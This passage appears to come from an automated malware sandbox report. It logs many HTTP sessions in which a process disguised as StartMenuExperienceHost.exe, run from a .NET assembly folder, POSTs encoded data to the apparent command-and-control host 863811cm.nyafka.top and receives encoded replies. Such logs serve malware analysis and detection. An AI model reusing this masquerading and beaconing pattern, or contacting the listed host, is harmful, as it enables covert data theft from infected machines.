                                                                Data Ascii: UY]]TYXP^ZUXQWZ_W]XZU\Q_XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z:+='(?T&.$<%$Y6;0+0)770>%S)F!!?)+#Y$/\*)
                                                                Oct 11, 2024 01:36:54.262815952 CEST746INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:36:54 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vZwOp7bayQ6XPGMxQ6b5%2FH6y8RkcIKWdsewkmCvE4P1JtvhBq5B08cV7J61NeGqBimntMlHTLI8fTX61LlP9AMIYLeN%2Bhiaq49P%2Bfb4TGlLP5%2B6pYPazPsiP4JJBv2ND1pFDSONW"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6f6938854402-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 27 15 28 2a 21 0f 23 00 0e 05 3b 1f 3c 12 2a 5b 3d 00 3f 0f 34 01 26 24 33 58 2e 2c 2d 52 22 38 3f 01 29 05 2e 12 27 12 38 05 3f 0b 2a 51 03 1b 39 12 3c 23 09 56 28 31 2d 16 28 1c 0f 17 26 30 39 41 29 5b 29 55 33 07 31 06 21 22 28 55 3d 05 2c 0c 2f 15 37 45 2a 16 32 5a 20 2b 2a 5f 08 13 3a 0d 28 2b 24 1c 21 27 36 01 21 3d 3c 0a 20 2a 2a 53 3e 17 00 1c 27 30 33 01 2d 31 34 58 34 2c 23 55 22 3c 22 1e 23 3d 20 5d 26 28 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98'(*!#;<*[=?4&$3X.,-R"8?).'8?*Q9<#V(1-(&09A)[)U31!"(U=,/7E*2Z +*_:(+$!'6!=< **S>'03-14X4,#U"<"#= ]&("_")Q?TR0
                                                                Oct 11, 2024 01:36:54.379367113 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2004
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:36:54.474064112 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:36:54.475393057 CEST2004OUTData Raw: 50 5d 58 5d 54 5a 58 5e 5e 5a 55 58 51 51 5a 5e 57 5f 58 59 55 53 51 53 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: P]X]TZX^^ZUXQQZ^W_XYUSQSXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9_)- X+9'13(5(]5?U9S#S3.!)(F"1)+#Y$/\*1
                                                                Oct 11, 2024 01:36:54.778989077 CEST750INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:36:54 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cRmLJIkAkJh2LY0mJ13fpSI1mXU0aD1IvIry4QCyHILLQfChRTPw%2FxI9N4edCwo7vocsJn91T9OWP0GMmvPqqk5F7%2BwOf4B6rhjn5z8%2Bh2%2BRV8%2F3v5L3pp%2Fzwc2tTOSg4GKx5V0T"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6f6c2bd54402-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 27 5f 3e 07 31 0c 23 10 0a 03 2d 31 33 06 29 3d 31 04 28 0f 01 59 32 1d 23 17 39 2c 36 0d 22 5d 2b 04 3e 12 29 07 30 05 27 12 28 0b 2a 51 03 1b 39 12 28 0a 27 56 28 0b 36 04 29 21 21 17 27 55 22 1a 2b 3d 0c 08 33 58 25 04 21 0f 2c 54 3e 3f 27 53 2d 3b 37 40 29 3b 2d 05 34 2b 2a 5f 08 13 3a 08 28 28 28 55 36 19 21 14 36 3d 15 10 35 39 04 51 3d 2a 2e 1c 27 55 27 00 3b 1c 28 5a 23 59 28 0d 23 2c 31 0d 20 04 34 11 26 12 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98'_>1#-13)=1(Y2#9,6"]+>)0'(*Q9('V(6)!!'U"+=3X%!,T>?'S-;7@);-4+*_:(((U6!6=59Q=*.'U';(Z#Y(#,1 4&"_")Q?TR0
                                                                Oct 11, 2024 01:36:54.895327091 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2004
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:36:54.989845037 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:36:54.990158081 CEST2004OUTData Raw: 55 5f 58 5e 51 5c 58 5e 5e 5a 55 58 51 5d 5a 5a 57 5a 58 58 55 55 51 5b 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: U_X^Q\X^^ZUXQ]ZZWZXXUUQ[XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z:+.4\+9'S1><@+#6'X?5V $3=%T)8,A"1+)#Y$/\*
                                                                Oct 11, 2024 01:36:55.284913063 CEST743INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:36:55 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VNoh2v90Ea%2FN0Hzg0QxDxCeFP3kY9%2Bsfpfdr23diL6OtjOWXEWizT42SWe3myJMxkpF%2F0LjHscoYDrwxULGuEEv%2BwW9lBPRT1A1aHOmEG1QNDmfOCFbjw%2B1HOimf2wpIrw9OM393"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6f6f68b24402-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 24 01 29 5f 32 56 23 10 28 05 2f 0f 20 1d 2b 3e 26 16 28 31 38 07 25 34 38 06 39 02 2e 0f 35 02 20 5e 3d 02 03 06 33 3f 37 58 2b 1b 2a 51 03 1b 39 59 3c 0a 30 0d 3c 31 2e 06 2b 32 25 5d 24 55 36 19 3e 2e 3d 55 30 3d 25 06 35 1f 2c 11 29 5a 30 0b 2d 28 20 18 2a 2b 2e 13 20 3b 2a 5f 08 13 3a 0d 29 06 09 0e 20 27 3a 04 23 3d 37 10 35 3a 29 09 3d 3a 3a 56 33 33 24 5e 2d 22 34 13 23 2f 27 56 22 05 3d 0f 34 3d 23 03 25 02 22 5f 22 00 29 51 00 3f 54 52 0d 0a
                                                                Data Ascii: 98$)_2V#(/ +>&(18%489.5 ^=3?7X+*Q9Y<0<1.+2%]$U6>.=U0=%5,)Z0-( *+. ;*_:) ':#=75:)=::V33$^-"4#/'V"=4=#%"_")Q?TR
                                                                Oct 11, 2024 01:36:55.413659096 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                37192.168.2.549952188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:36:53.945321083 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:36:54.300968885 CEST2584OUTData Raw: 50 5c 58 5d 54 5f 58 57 5e 5a 55 58 51 56 5a 59 57 5c 58 5a 55 52 51 5e 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: P\X]T_XW^ZUXQVZYW\XZURQ^XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9X).4(+S&(C,Y6(,(.7'>9S(+4G6W,[);#Y$/\*-
                                                                Oct 11, 2024 01:36:54.390644073 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:36:54.562474966 CEST593INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:36:54 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ydnpZ0HP3TNBDofBHP6eVHaYyQ50c0n9KtV5peWjTP1rBKCVgaqGxMvxhLg2NISd%2BvW3Jqs%2F6hJ2G1KafwMT8ZQluTXNKdjciZhfEWKfXAdW1RuBa2ngcJXLrKp7AKyl5i87pkWv"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6f6bad467cea-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                38192.168.2.549959188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:36:54.693126917 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:36:55.050740004 CEST2584OUTData Raw: 50 5f 5d 5e 54 5c 58 50 5e 5a 55 58 51 51 5a 58 57 50 58 58 55 56 51 59 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: P_]^T\XP^ZUXQQZXWPXXUVQYXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9_(>0Y>9?S&X?+,!?[< 67'+V3-1V>462;=+#Y$/\*1
                                                                Oct 11, 2024 01:36:55.147794008 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:36:55.320833921 CEST595INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:36:55 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p%2Feco92rgP8T9suTPT1OujKKRys0CfPesDw%2FMPu5uDc3spDUfGSDutD3UiMFXnioML7wykDHcrCFrkL9C5PY2IP2iyfvxnRYAfeNv74mzxvCjKp8m8M9sQOgwanSHLkHX%2F1TA9mN"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6f705eb27d18-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                39192.168.2.549965188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:36:55.442363977 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:36:55.800789118 CEST2584OUTData Raw: 55 58 58 5d 51 5f 5d 53 5e 5a 55 58 51 5c 5a 59 57 59 58 5a 55 5c 51 5f 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: UXX]Q_]S^ZUXQ\ZYWYXZU\Q_XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9<-3?;U2-<B*5";0<3V!$'=V(; F51?>#Y$/\*
                                                                Oct 11, 2024 01:36:55.895711899 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:36:56.145580053 CEST597INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:36:56 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uzuvKE56GtYSFfL5zmJW%2Ffe9RRw%2F%2FuNA72mJLXMgFulHnmi5eEBQxgGbGUk9jc8Ehk96wEvQsXuxxjJihgGZNr4muzJkb3nlR2%2FyhkTY60qfqphXtdhuEbjx1iAz6N9Bqm2PTpaf"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6f750b7741c3-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                40192.168.2.549966188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:36:55.526674986 CEST335OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 1992
                                                                Expect: 100-continue
                                                                Connection: Keep-Alive
                                                                Oct 11, 2024 01:36:55.879293919 CEST1992OUTData Raw: 50 5d 58 58 54 55 5d 54 5e 5a 55 58 51 55 5a 52 57 50 58 5a 55 5c 51 5b 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: P]XXTU]T^ZUXQUZRWPXZU\Q[XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9).<[?)?V&X<@?676'(W7B?$>8B60_(;#Y$/\*
                                                                Oct 11, 2024 01:36:55.980717897 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:36:56.144311905 CEST754INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:36:56 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ygthXfcLIrWl%2FcBKWDqfJWq40ZFbBVr59atf8RyJXAHUrR15YLRQ%2Bm7LcTFsbOJ%2Bbqt%2F6zFRd%2BkgWax8G3FBFzCQ6OqaeWRz7h0%2BmQGenv2lA0dvfGrnm%2Baao6c7vR7d8js3c%2Fr1"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6f759e440f81-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 27 5c 3e 00 2d 0e 22 3e 34 01 3b 0f 20 5f 2a 3d 25 05 2b 32 2b 5e 26 1d 38 06 2d 5a 36 0d 23 3b 30 5f 3e 3f 2e 12 30 3c 09 5d 28 1b 2a 51 03 1b 39 5e 28 33 06 0d 28 54 2e 03 2b 0b 39 59 30 0d 14 1c 29 2d 29 50 27 3d 2e 5e 35 57 38 1f 3e 3c 0e 0a 3b 3b 27 0a 2a 3b 22 5a 34 01 2a 5f 08 13 39 50 3e 16 2f 09 22 27 21 5f 35 03 15 56 22 07 0b 0a 29 07 32 1d 25 20 38 59 3b 1c 38 5a 37 3f 3f 51 21 3f 36 55 23 03 28 5a 32 38 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98'\>-">4; _*=%+2+^&8-Z6#;0_>?.0<](*Q9^(3(T.+9Y0)-)P'=.^5W8><;;'*;"Z4*_9P>/"'!_5V")2% 8Y;8Z7??Q!?6U#(Z28"_")Q?TR0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                41192.168.2.549972188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:36:56.260922909 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 1980
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:36:56.613408089 CEST1980OUTData Raw: 50 53 5d 59 54 5d 5d 52 5e 5a 55 58 51 52 5a 5f 57 5b 58 5a 55 57 51 5b 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: PS]YT]]R^ZUXQRZ_W[XZUWQ[XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9+.7?\/%+%,\"]'(#!#''[1V)(/"1<*#Y$/\*
                                                                Oct 11, 2024 01:36:56.710197926 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:36:56.955462933 CEST742INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:36:56 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vns3jwmVfW9yQILHgRV55KJE2KP74RDZodTfiNEmBC5a5koCusffYqftphU08JDLC%2BZQTPEELR1S0UP93me9tkcea951RmOwxevG%2Fmxzkj35oinxJLlapON0frCSyI2EpZyqnLUI"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6f7a2ca08c4d-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 24 05 2a 29 26 10 34 3e 0d 58 2c 08 30 10 29 3d 2a 5e 2b 1f 34 03 24 37 24 05 3a 02 29 55 23 2b 01 06 3e 05 2e 12 27 05 37 5a 2b 21 2a 51 03 1b 3a 00 28 0a 33 1e 29 32 21 5d 28 21 2d 59 27 33 14 1d 3d 3d 0f 54 25 3e 29 04 35 31 0e 1f 3e 02 06 0b 2f 28 3c 18 2a 16 2a 11 21 2b 2a 5f 08 13 3a 0d 2a 28 24 1e 21 09 25 5f 22 3d 15 53 36 07 0f 0e 3e 17 22 1c 27 30 3c 5c 2c 0c 24 58 23 2f 23 55 21 2c 36 1f 23 3d 2b 01 26 28 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98$*)&4>X,0)=*^+4$7$:)U#+>.'7Z+!*Q:(3)2!](!-Y'3==T%>)51>/(<**!+*_:*($!%_"=S6>"'0<\,$X#/#U!,6#=+&("_")Q?TR0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                42192.168.2.549973188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:36:56.271164894 CEST335OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Connection: Keep-Alive
                                                                Oct 11, 2024 01:36:56.630465031 CEST2584OUTData Raw: 50 58 58 5a 54 58 5d 56 5e 5a 55 58 51 56 5a 59 57 59 58 5e 55 55 51 5d 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: PXXZTX]V^ZUXQVZYWYX^UUQ]XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9?[,>*U'=0++5 ()7(3>1U>(F!+(+#Y$/\*-
                                                                Oct 11, 2024 01:36:56.714725018 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:36:57.009361982 CEST592INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:36:56 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bmoHFbbPiG06fI39VvSuF4kr8gQQq9Egl0EQPmeWMxD20d1bfLSyZJwUgP0jc1Q7XEka%2FVcm5NKjr0VomSzTirzSRhvbyTYjmIR7F%2Bfb8AnTN%2F4VT3V%2BKPlq2hfcOJm8cxIyLEtN"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6f7a2e6841ff-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a
                                                                Data Ascii: 44Z^Q
                                                                Oct 11, 2024 01:36:57.095498085 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                43192.168.2.549979188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:36:57.072257042 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2004
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:36:57.425725937 CEST2004OUTData Raw: 55 5e 5d 5e 51 59 5d 54 5e 5a 55 58 51 51 5a 5d 57 5d 58 5a 55 57 51 52 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: U^]^QY]T^ZUXQQZ]W]XZUWQRXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z:<-<]?%=;?%$]"]<<!U $;3-S*(/ 1_(+#Y$/\*1
                                                                Oct 11, 2024 01:36:57.520502090 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:36:57.764475107 CEST754INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:36:57 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
